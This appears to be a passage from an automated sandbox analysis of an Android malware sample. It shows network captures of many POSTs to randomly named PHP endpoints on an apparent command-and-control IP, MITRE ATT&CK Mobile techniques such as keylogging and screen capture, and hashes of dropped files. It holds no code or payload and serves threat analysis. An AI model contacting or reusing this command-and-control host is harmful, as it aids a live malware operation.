Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:44 GMT
Content-Length: 88
POST

http://80.64.30.123/php/zxzcu4izu.php/

Remote address:

80.64.30.123:80

Request

POST /php/zxzcu4izu.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 195
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:44 GMT
Content-Length: 24
POST

http://80.64.30.123/php/n0glkmg9.php/

Remote address:

80.64.30.123:80

Request

POST /php/n0glkmg9.php/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
Content-Length: 738
Content-Type: application/x-www-form-urlencoded
Host: 80.64.30.123
Connection: Keep-Alive
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Authorization, Content-Type, Content-Length, X-CSRF-Token, Token, session, Origin, Host, Connection, Accept-Encoding, Accept-Language, X-Requested-With
Access-Control-Allow-Methods: POST, OPTIONS, GET, PUT, DELETE
Access-Control-Allow-Origin: https://localhost:45051//
Content-Type: text/plain; charset=utf-8
Date: Tue, 10 Sep 2024 08:53:44 GMT
Content-Length: 24
DNS

android.apis.google.com

Remote address:

1.1.1.1:53

Request

android.apis.google.com

IN A

Response

android.apis.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

142.250.200.46

80.64.30.123:80

http://80.64.30.123/socket.io/?EIO=3&transport=polling&sid=98a5

http

1.5kB
2.2kB
17
14

HTTP Request

GET http://80.64.30.123/socket.io/?EIO=3&transport=polling

HTTP Response

200

HTTP Request

GET http://80.64.30.123/socket.io/?EIO=3&transport=polling&sid=98a5

HTTP Response

200

HTTP Request

POST http://80.64.30.123/socket.io/?EIO=3&transport=polling&sid=98a5

HTTP Response

200
80.64.30.123:80

http://80.64.30.123/socket.io/?EIO=3&transport=websocket&sid=98a5

http

2.0kB
1.5kB
32
19

HTTP Request

GET http://80.64.30.123/socket.io/?EIO=3&transport=websocket&sid=98a5

HTTP Response

101
80.64.30.123:80

http://80.64.30.123/socket.io/?EIO=3&transport=polling&sid=98a5

http

851 B
1.1kB
13
12

HTTP Request

GET http://80.64.30.123/socket.io/?EIO=3&transport=polling&sid=98a5

HTTP Response

200
142.250.187.232:443

ssl.google-analytics.com

tls

1.3kB
5.8kB
9
8
80.64.30.123:80

http://80.64.30.123/php/ydhhphpw42040oo2z.php/

http

62.5kB
1.4MB
706
967

HTTP Request

POST http://80.64.30.123/php/q05v1txzdu7xhumg.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/xx042i6r27.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/1t1jkdwm94uww9zm.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/ly0jt74muk0lwv.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/2nzo3p.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/fefqi.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/hx8u.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/dvtmdqcihvg00o01hej.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/vmpm71pch5wise.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/ml6v5pmq3287.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/d184z6f8xvzq0.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/bkucdlm.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/jdy1zzq.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/2km9bl24ir.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/c4tzc2u4hmg7logxub4.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/qii76zua7xa8o46.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/p8km5h8quxs.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/jm609n.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/y8inwdv1nsl272zf3s7.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/5k2kgmqs.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/p8e3oqyqf1j427.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/ghf1.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/hmpco61wj0pvbh7ki.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/ot4fogd1248u51yte.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/m2ab2n8ques.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/y8jwke5g.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/zsle3kvdi8jhndyaea.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/tqz0vq8ncd3f3.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/srsswm9.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/0drwayd.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/npt.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/mf9z5ymj7slr0jm.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/ra.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/p2ih5913w5a3pd262kss.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/rv6katpdoiysnn.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/vsdxb8qgh5tyu.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/mlctavxdit9yh2z3scm0.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/gs1wtp.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/bummr9uvuulkdceh2.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/53jd.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/c9at.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/3n2fkcspe51o7xlz.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/u4anp4eacmudg.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/ydhhphpw42040oo2z.php/

HTTP Response

200
172.217.169.78:443

www.youtube.com

tls

2.1kB
8.3kB
17
14
80.64.30.123:80

http://80.64.30.123/php/5rvnb.php/

http

45.0kB
20.3kB
81
39

HTTP Request

POST http://80.64.30.123/php/ecjluwgn.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/yr5cl0o864ren0hldfj1.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/o1174a87d9fzywge.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/s5y181hswl53.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/96rfq76a4ohl.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/j3rmrll8bgpj16557l.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/l23qny.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/q2vc6j2s9bkg.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/rcd6ui7bx7r.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/g7gzaxgoll.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/pwn.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/3ep5uuml7b6dk7ge83b.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/2bmwl8pyl6qs9.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/7xlwjnwea157.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/x4z1km.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/hz907odi.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/te49i39s7p.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/ltnf1kld4zg8lap.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/0y0ijglatm8w5.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/d.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/vgdw7zvg.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/j1agwuif8y4xhh8.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/u6siw6smqzzje325.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/6qreyjxsjry8rf3o.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/8t22c4dnanu9ie.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/de29d32pd.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/mo5jhk45bgy9.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/e4rxow.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/cneysb52n07p.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/32l.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/0xpa68w5eqhquv.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/ctb27.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/t581shkcnok9z.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/e5ynasns.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/biwua7pkf.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/5rvnb.php/

HTTP Response

200
80.64.30.123:80

http://80.64.30.123/php/8mb65hxl.php/

http

3.8kB
2.5kB
14
10

HTTP Request

POST http://80.64.30.123/php/39ncqgdgj9ij3z3.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/bvudw8sxhjl89kiwsoi3.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/1.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/8mb65hxl.php/

HTTP Response

200
80.64.30.123:80

http://80.64.30.123/php/9rp2t.php/

http

1.6kB
1.6kB
13
11

HTTP Request

POST http://80.64.30.123/php/8.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/9rp2t.php/

HTTP Response

200
80.64.30.123:80

http://80.64.30.123/php/n0glkmg9.php/

http

2.2kB
1.6kB
13
11

HTTP Request

POST http://80.64.30.123/php/zxzcu4izu.php/

HTTP Response

200

HTTP Request

POST http://80.64.30.123/php/n0glkmg9.php/

HTTP Response

200
216.239.32.223:443

tls, https

128 B
40 B
2
1
172.217.16.238:443

www.youtube.com

tls

135 B
40 B
2
1
142.250.187.206:443

www.youtube.com

tls, https

920 B
40 B
1
1
142.250.200.46:443

android.apis.google.com

tls

2.0kB
1.7kB
9
8
142.250.187.225:443

tls

135 B
40 B
2
1
216.239.32.223:443

tls, https

128 B
40 B
2
1
142.250.178.1:443

tls

135 B
40 B
2
1
216.239.32.223:443

tls, https

128 B
40 B
2
1

224.0.0.251:5353

3.8kB
12
1.1.1.1:53

www.youtube.com

dns

122 B
351 B
2
1

DNS Request

www.youtube.com

DNS Request

www.youtube.com

DNS Response

172.217.169.78

172.217.16.238

216.58.212.238

142.250.200.14

172.217.169.14

142.250.200.46

216.58.201.110

142.250.187.238

216.58.213.14

142.250.179.238

172.217.169.46

216.58.204.78

142.250.180.14

142.250.178.14

142.250.187.206

216.58.212.206
1.1.1.1:53

ssl.google-analytics.com

dns

70 B
86 B
1
1

DNS Request

ssl.google-analytics.com

DNS Response

142.250.187.232
172.217.169.78:443

www.youtube.com

https

1.4kB
54 B
1
1
1.1.1.1:53

android.apis.google.com

dns

69 B
109 B
1
1

DNS Request

android.apis.google.com

DNS Response

142.250.200.46

MITRE ATT&CK Mobile v15

Initial Access

Execution

Scheduled Task/Job

T1603

Persistence

Foreground Persistence

T1541

Scheduled Task/Job

T1603

Privilege Escalation

Defense Evasion

Download New Code at Runtime

T1407

Foreground Persistence

T1541

Impair Defenses

T1629

Prevent Application Removal

T1629.001

Input Injection

T1516

Virtualization/Sandbox Evasion

T1633

System Checks

T1633.001

Credential Access

Access Notifications

T1517

Clipboard Data

T1414

Input Capture

T1417

GUI Input Capture

T1417.002

Keylogging

T1417.001

Discovery

Process Discovery

T1424

Software Discovery

T1418

Security Software Discovery

T1418.001

System Information Discovery

T1426

System Network Configuration Discovery

T1422

System Network Connections Discovery

T1421

Lateral Movement

Collection

Access Notifications

T1517

Clipboard Data

T1414

Input Capture

T1417

GUI Input Capture

T1417.002

Keylogging

T1417.001

Screen Capture

T1513

Command and Control

Exfiltration

Impact

Data Encrypted for Impact

T1471

Data Manipulation

T1641

Transmitted Data Manipulation

T1641.001

Input Injection

T1516

Replay Monitor

Loading Replay Monitor...

Downloads

/data/data/com.karqksqxc.mebijyvnp/app_dex/classes.dex

Filesize
2.9MB

MD5
1b6b1944b8c450ffb96fcbadc6efadc6

SHA1
1d67379a4bf1e300232aefd4588ed795e8f78402

SHA256
82f374e607fb904616863fa5ce54182b0a13bbfd746066b6ab96982eef5851ba

SHA512
df765df9e5ae27a4570c4e17697cc600dd2e2f726fb2968676898b8df02b01b7a5faaad1a3f05e569da0b6ef8973738bc414910282822434173cb54bd50fe83b

Download Submit
/data/data/com.karqksqxc.mebijyvnp/cache/classes.dex

Filesize
1.0MB

MD5
51cc540e5296ecdd02af0c1fa0b9077d

SHA1
109b85537b514cd2f7b8fdaa42525eb06c915209

SHA256
dfbc1fe906fd3827c61fdb27232c27523d75f0c0e8dc3785b90e3b2ad942de94

SHA512
4214020cb7352fed8b513827ed334141c23f573bfdedf2ac6cb2b255af25be0a01f53eb24bf1b129b357debb5d07c0f085b972e08207df82ceba97cae165d80a

Download Submit
/data/data/com.karqksqxc.mebijyvnp/cache/classes.zip

Filesize
1.0MB

MD5
3b8755a2d210a390f2f56764c397bbd2

SHA1
e861d037f6711152e78fd70d23b9a80af636d5f0

SHA256
a3cecb595339d876e4c323ccdc075a80f8483d3407b1d445235873af32f5656f

SHA512
c9d7196a748f9b4d1d30ae5e0e254df9284f4f6ed6e7e18df56b345571b4ac89c8c617aebe4c266c62616cc5819675341b671c0af3b0455876e66db724ecc9ea

Download Submit
/data/data/com.karqksqxc.mebijyvnp/no_backup/androidx.work.workdb

Filesize
4KB

MD5
7e858c4054eb00fcddc653a04e5cd1c6

SHA1
2e056bf31a8d78df136f02a62afeeca77f4faccf

SHA256
9010186c5c083155a45673017d1e31c2a178e63cc15a57bbffde4d1956a23dad

SHA512
d0c7a120940c8e637d5566ef179d01eff88a2c2650afda69ad2a46aad76533eaace192028bba3d60407b4e34a950e7560f95d9f9b8eebe361ef62897d88b30cb

Download Submit
/data/data/com.karqksqxc.mebijyvnp/no_backup/androidx.work.workdb-journal

Filesize
512B

MD5
c1b525f25c64a629c0e0de3e77e28abc

SHA1
1a1be1fc5fbc81d35eaf15aa37dd777a3037d67c

SHA256
d02b1c617ebb460c0bd788b5ac22dd4f8b0582d61fa475f03c6f030ade4d70e2

SHA512
156f995ac3aaf4faf54635ec7e70f004ed1bff3c1124323f8370477b20ba8eb284217d043758a4478891d2b1032b9ed677e8b64aab9e5e887813dfe61a354c46

Download Submit
/data/data/com.karqksqxc.mebijyvnp/no_backup/androidx.work.workdb-shm

Filesize
32KB

MD5
bb7df04e1b0a2570657527a7e108ae23

SHA1
5188431849b4613152fd7bdba6a3ff0a4fd6424b

SHA256
c35020473aed1b4642cd726cad727b63fff2824ad68cedd7ffb73c7cbd890479

SHA512
768007e06b0cd9e62d50f458b9435c6dda0a6d272f0b15550f97c478394b743331c3a9c9236e09ab5b9cb3b423b2320a5d66eb3c7068db9ea37891ca40e47012

Download Submit
/data/data/com.karqksqxc.mebijyvnp/no_backup/androidx.work.workdb-wal

Filesize
16KB

MD5
d2cad0934694c87a2ca538a015f8ef56

SHA1
b45abfcde40cae37a8635d678ecce5da6a86d376

SHA256
6aa25901486aa84ffd1a9c639f2338f2d562f00ea4275d7021d40d1aeb1cc544

SHA512
9df774869a5fb6c1beb21a0471ddb090d2a61ab7badbd760f5b45c5f5ae9357b4d5c32323d1c528afa94d031f17bcc66e4c72c07821ab56493f053b85f80b543

Download Submit
/data/data/com.karqksqxc.mebijyvnp/no_backup/androidx.work.workdb-wal

Filesize
108KB

MD5
350026e3d28f85797da6e1beac65e4dd

SHA1
a676b26f2f56da6e862481b78a47c31f2da09a83

SHA256
22c8bcf1d91f0b9101114dfeeb6080b3025739adfe01025451c553b63f2d4934

SHA512
a87b01a9d56281bc9b1a5aafb3cbeb7b144663c96b24ebdbe900b9787576c1b7263ccc6befa17a79cb60dcfa5dd24b094cec67316de4ef4eec770fdefb551b56

Download Submit
/data/data/com.karqksqxc.mebijyvnp/no_backup/androidx.work.workdb-wal

Filesize
173KB

MD5
885c56d6cd5ec0f85cf5bf6d98e896e0

SHA1
65438d6a50447038403f2b6389a53c91c001f26d

SHA256
bd449e16ec96ea1e5d03fe4dfe5d055ce93219e607ce75a742ab9202cacc3f86

SHA512
0c526fde4084b5fcae90487c068c6301d07efc0ddaa877e792d3691083b970c1589d5e5d14de14db2f59157a9b73debab7d1cf284a857d8ee38e61a79cd4181a

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response